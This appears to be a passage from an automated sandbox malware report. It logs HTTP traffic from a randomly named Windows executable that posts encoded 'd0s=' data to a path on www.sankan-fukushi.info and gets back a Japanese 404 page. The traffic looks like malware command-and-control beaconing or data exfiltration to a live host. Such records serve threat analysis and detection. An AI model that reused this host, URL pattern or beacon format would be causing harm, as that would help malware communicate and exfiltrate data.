Nov 27, 2024 08:55:44.453521013 CET	810	OUT	POST /aayz/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.sankan-fukushi.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 216 Connection: close Referer: http://www.sankan-fukushi.info/aayz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 6b 49 52 72 43 63 38 4d 31 78 52 38 78 78 67 58 39 74 71 78 51 32 4d 58 4a 45 78 66 63 39 35 62 33 37 4e 30 6b 79 38 68 42 6d 41 72 77 69 4d 69 50 79 6a 33 4a 68 78 34 42 35 35 79 67 6c 4f 59 46 50 38 44 31 78 70 30 4c 2b 35 4e 45 52 68 74 67 5a 59 53 70 4f 4f 6e 6e 55 4c 73 6e 4d 78 4c 41 65 75 53 6e 6d 62 69 73 75 65 6c 75 67 69 77 4f 4d 6f 79 42 46 66 44 45 36 55 39 64 49 76 77 4a 62 62 5a 6b 62 6b 35 57 54 48 41 70 66 37 6f 50 59 46 51 6b 69 6f 72 38 45 58 6f 6f 4e 6d 78 78 47 41 35 43 54 7a 76 78 39 2f 68 56 6e 4e 67 6e 44 31 57 74 48 4b 4c 61 64 56 64 65 35 75 6f 57 4a 49 6a 77 51 3d 3d Data Ascii: d0s=IwMkv5ZaXfp9kIRrCc8M1xR8xxgX9tqxQ2MXJExfc95b37N0ky8hBmArwiMiPyj3Jhx4B55yglOYFP8D1xp0L+5NERhtgZYSpOOnnULsnMxLAeuSnmbisuelugiwOMoyBFfDE6U9dIvwJbbZkbk5WTHApf7oPYFQkior8EXooNmxxGA5CTzvx9/hVnNgnD1WtHKLadVde5uoWJIjwQ==
Nov 27, 2024 08:55:45.976119041 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:55:45 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Nov 27, 2024 08:55:45.976160049 CET	231	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
Nov 27, 2024 08:55:45.976171017 CET	1236	IN	Data Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
Nov 27, 2024 08:55:45.976309061 CET	1236	IN	Data Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
Nov 27, 2024 08:55:45.976322889 CET	1236	IN	Data Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
Nov 27, 2024 08:55:45.976414919 CET	1236	IN	Data Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
Nov 27, 2024 08:55:45.976425886 CET	1236	IN	Data Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31 Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
Nov 27, 2024 08:55:45.976438046 CET	1236	IN	Data Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
Nov 27, 2024 08:55:45.976449966 CET	1236	IN	Data Raw: 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31 2e 38 20 30 2d 33 2e Data Ascii: .78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.602-1.09
Nov 27, 2024 08:55:45.976463079 CET	1236	IN	Data Raw: 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31 38 20 31 2e 31 32 32 Data Ascii: 306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.038-1.776

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49917	163.44.185.183	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:47.119599104 CET	830	OUT	POST /aayz/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.sankan-fukushi.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 236 Connection: close Referer: http://www.sankan-fukushi.info/aayz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 69 6f 68 72 4f 62 41 4d 77 52 52 39 74 42 67 58 30 4e 71 31 51 32 51 58 4a 41 70 50 63 4c 52 62 33 5a 46 30 6c 7a 38 68 43 6d 41 72 6c 53 4d 72 58 53 6a 38 4a 68 74 77 42 35 46 79 67 6b 71 59 46 50 4d 44 31 47 39 33 4e 2b 35 50 4d 78 68 72 75 35 59 53 70 4f 4f 6e 6e 55 66 47 6e 4d 70 4c 41 75 2b 53 31 33 62 6a 76 75 65 6d 35 51 69 77 5a 38 6f 32 42 46 65 57 45 2f 39 51 64 4b 58 77 4a 61 72 5a 6b 4a 4d 36 63 54 48 4f 6d 2f 36 6b 49 61 78 66 38 58 34 62 39 43 4c 44 70 71 32 67 39 51 42 62 59 78 2f 44 76 73 48 61 52 6c 70 57 77 6c 6f 6a 76 47 4f 54 58 2f 68 38 42 4f 4c 43 62 62 70 6e 6d 71 4e 4a 57 50 57 57 63 76 6b 56 54 70 36 66 50 7a 2b 45 6d 6a 77 3d Data Ascii: d0s=IwMkv5ZaXfp9iohrObAMwRR9tBgX0Nq1Q2QXJApPcLRb3ZF0lz8hCmArlSMrXSj8JhtwB5FygkqYFPMD1G93N+5PMxhru5YSpOOnnUfGnMpLAu+S13bjvuem5QiwZ8o2BFeWE/9QdKXwJarZkJM6cTHOm/6kIaxf8X4b9CLDpq2g9QBbYx/DvsHaRlpWwlojvGOTX/h8BOLCbbpnmqNJWPWWcvkVTp6fPz+Emjw=
Nov 27, 2024 08:55:48.537363052 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:55:48 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Nov 27, 2024 08:55:48.537409067 CET	231	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
Nov 27, 2024 08:55:48.537422895 CET	1236	IN	Data Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
Nov 27, 2024 08:55:48.537481070 CET	1236	IN	Data Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
Nov 27, 2024 08:55:48.537493944 CET	1236	IN	Data Raw: 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 Data Ascii: .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen a
Nov 27, 2024 08:55:48.537507057 CET	1236	IN	Data Raw: 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 Data Ascii: /svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 1
Nov 27, 2024 08:55:48.537522078 CET	1236	IN	Data Raw: 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31 Data Ascii: 6 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.40
Nov 27, 2024 08:55:48.537733078 CET	1236	IN	Data Raw: 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e Data Ascii: .621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168
Nov 27, 2024 08:55:48.537746906 CET	1236	IN	Data Raw: 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31 2e 38 20 30 2d 33 2e Data Ascii: .78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.602-1.09
Nov 27, 2024 08:55:48.537763119 CET	1236	IN	Data Raw: 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31 38 20 31 2e 31 32 32 Data Ascii: 306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.038-1.776
Nov 27, 2024 08:55:48.657587051 CET	1236	IN	Data Raw: 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 30 32 33 2e 31 32 36 2e 30 35 36 2e 32 35 2e 31 2e 33 37 31 2e 33 31 32 2e 37 34 33 20 31 2e 30 34 31 20 31 2e 32 32 34 Data Ascii: 4-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.218.805-.006 1.528-.497 1.829-1.244l.061-.2.029-.146c.201-.812-.116-1.664-.8-2.146-.332-.231-.727-.355-1.131-.354h-.001zm0-9.692c-.405-.001-.801.124-1.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49923	163.44.185.183	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:49.789228916 CET	1843	OUT	POST /aayz/ HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US Origin: http://www.sankan-fukushi.info Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1248 Connection: close Referer: http://www.sankan-fukushi.info/aayz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS) Data Raw: 64 30 73 3d 49 77 4d 6b 76 35 5a 61 58 66 70 39 69 6f 68 72 4f 62 41 4d 77 52 52 39 74 42 67 58 30 4e 71 31 51 32 51 58 4a 41 70 50 63 4c 70 62 33 71 64 30 6b 51 55 68 44 6d 41 72 35 43 4d 6d 58 53 6a 39 4a 68 6c 38 42 35 49 46 67 6d 69 59 45 74 45 44 33 7a 52 33 65 65 35 50 4f 78 68 75 67 5a 5a 50 70 50 2b 5a 6e 55 50 47 6e 4d 70 4c 41 6f 53 53 6c 57 62 6a 70 75 65 6c 75 67 69 38 4f 4d 6f 65 42 44 32 47 45 2f 78 6d 64 36 33 77 4a 36 37 5a 69 38 51 36 51 54 48 4d 68 2f 37 35 49 61 73 66 38 58 4d 78 39 43 58 70 70 74 43 67 2f 57 68 47 42 43 33 68 79 2f 62 41 66 30 42 53 32 32 70 55 6a 58 75 4a 49 38 78 36 44 50 37 4e 66 4e 4d 72 67 4d 73 30 57 76 79 66 66 76 63 4e 62 50 6e 7a 64 68 69 78 34 6e 66 73 42 4b 69 61 32 64 65 56 63 57 66 67 4d 59 67 6b 69 73 6c 78 53 71 30 47 65 77 58 61 35 72 62 65 53 69 63 35 4a 4c 44 46 70 6e 71 67 56 45 79 32 56 46 4e 48 51 58 69 43 45 77 5a 44 45 35 49 42 4e 4b 71 68 77 43 73 56 76 78 5a 33 65 30 53 39 76 71 4c 76 78 4b 32 31 2f 39 69 35 4f 64 63 70 69 37 42 6c 33 6e [TRUNCATED] Data Ascii: d0s=IwMkv5ZaXfp9iohrObAMwRR9tBgX0Nq1Q2QXJApPcLpb3qd0kQUhDmAr5CMmXSj9Jhl8B5IFgmiYEtED3zR3ee5POxhugZZPpP+ZnUPGnMpLAoSSlWbjpuelugi8OMoeBD2GE/xmd63wJ67Zi8Q6QTHMh/75Iasf8XMx9CXpptCg/WhGBC3hy/bAf0BS22pUjXuJI8x6DP7NfNMrgMs0WvyffvcNbPnzdhix4nfsBKia2deVcWfgMYgkislxSq0GewXa5rbeSic5JLDFpnqgVEy2VFNHQXiCEwZDE5IBNKqhwCsVvxZ3e0S9vqLvxK21/9i5Odcpi7Bl3nmL0YhjXyTCRnHjxmCuR7VWa5u+AKAUiQ8wQvgzYRUA1dIhh/ECSqlYDL7OOTxbT2IvMIRZgQecX/nd/OANmBNrn5pywoi821/NNZp8h8RcwtWAdcE91pFf8KqknWxIxrF8YkbgPLJ6Ymiunb4D9BSLyP+Sk2u4P5M+d+giPqfPGz5Q5F2Mmeg5HZi1BUxa3epxeGamcIjcK1MXOog+Sy2dmNvHYpEmTfPIh+h3/iUZZKnlSM70mMY/j3IgEw6gN6L3Be8y2hmEep3xv8/TjGbZFvB9MfkxdcXpmrZKeIzIYZOHRW1hVIiKVylAgmbwQ6il7JC/MgpVZKjajVagLCZq7S4qNBi63DtzG/JfSrf1vc+PcWmaPGWdy9rY0Dtozinvsx9MVSFhm/8xzVJvcG/IqydI8vKC7dHD/GLC7+pGNNo4NdEuzfw3QFRusrypVtlWVZwPecVOOdtL8IOzo9z0/g0GMLiwn4jtDOFe4oVxgtsunpNxuZuwuxdbjENsHD8tQEkdZPkW430DXsvG+EKwedBokbLYiIrxc01SASjItzz2X/xGz/5yVFoq2uqWF2z1LpBJfpG3YaAFC7J89K1gKtQB73DcTzIqx3bvEGgXYrjn/qZL1mMpFrg+uTy3mOU77adv2nAi1Zwke5+8qGmf0Q5H+M5xejFE [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49929	163.44.185.183	80	2340	C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 27, 2024 08:55:52.438808918 CET	546	OUT	GET /aayz/?d0s=FykEsP9vX91sr4gIXaga4DgAunY4y8OIW35pWix+cNhS3OVLkBIKdkYv5gM3ZSr/GxN1W6QlvHKhJe8Q7ylOVoBzLShipJdbmb6MlmPWhdxEVrWCkEizo+iavQabSegVUCqoN7tDdJKm&Zvd8B=gHrX0lXPMBRt-RA HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
Nov 27, 2024 08:55:53.964023113 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 27 Nov 2024 07:55:53 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 